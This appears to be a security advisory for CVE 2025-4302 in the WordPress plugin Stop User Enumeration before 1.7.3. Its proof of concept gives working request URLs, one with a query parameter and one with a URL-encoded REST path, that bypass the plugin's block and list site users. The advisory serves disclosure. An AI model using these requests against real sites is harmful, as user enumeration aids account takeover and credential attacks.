Stop User Enumeration < 1.7.3 – Protection Bypass | CVE 2025-4302

Description

The plugin blocks REST API /wp-json/wp/v2/users/ requests for non-authorized users. However, this can be bypassed by URL-encoding the API path.

Proof of Concept

v <= 1.7.2 - https://example.com/wp-json/wp/v2/users?foo=simple-jwt-login

v < 1.7.2:

Use a browser and submit a request for the URL: 

https://example.com/wp-json/wp/v2/users/

The application will return the following message:

"{"code":"rest_cannot_access","message":"Only authenticated users can access the User endpoint REST API.","data":{"status":401}}"

URL-encode the REST API path:

wp-json/wp/v2/users/

To:

%77%70%2d%6a%73%6f%6e%2f%77%70%2f%76%32%2f%75%73%65%72%73%2f

and submit a request using the modified path: 

https://example.com/%77%70%2d%6a%73%6f%6e%2f%77%70%2f%76%32%2f%75%73%65%72%73%2f

the application will return the list of users.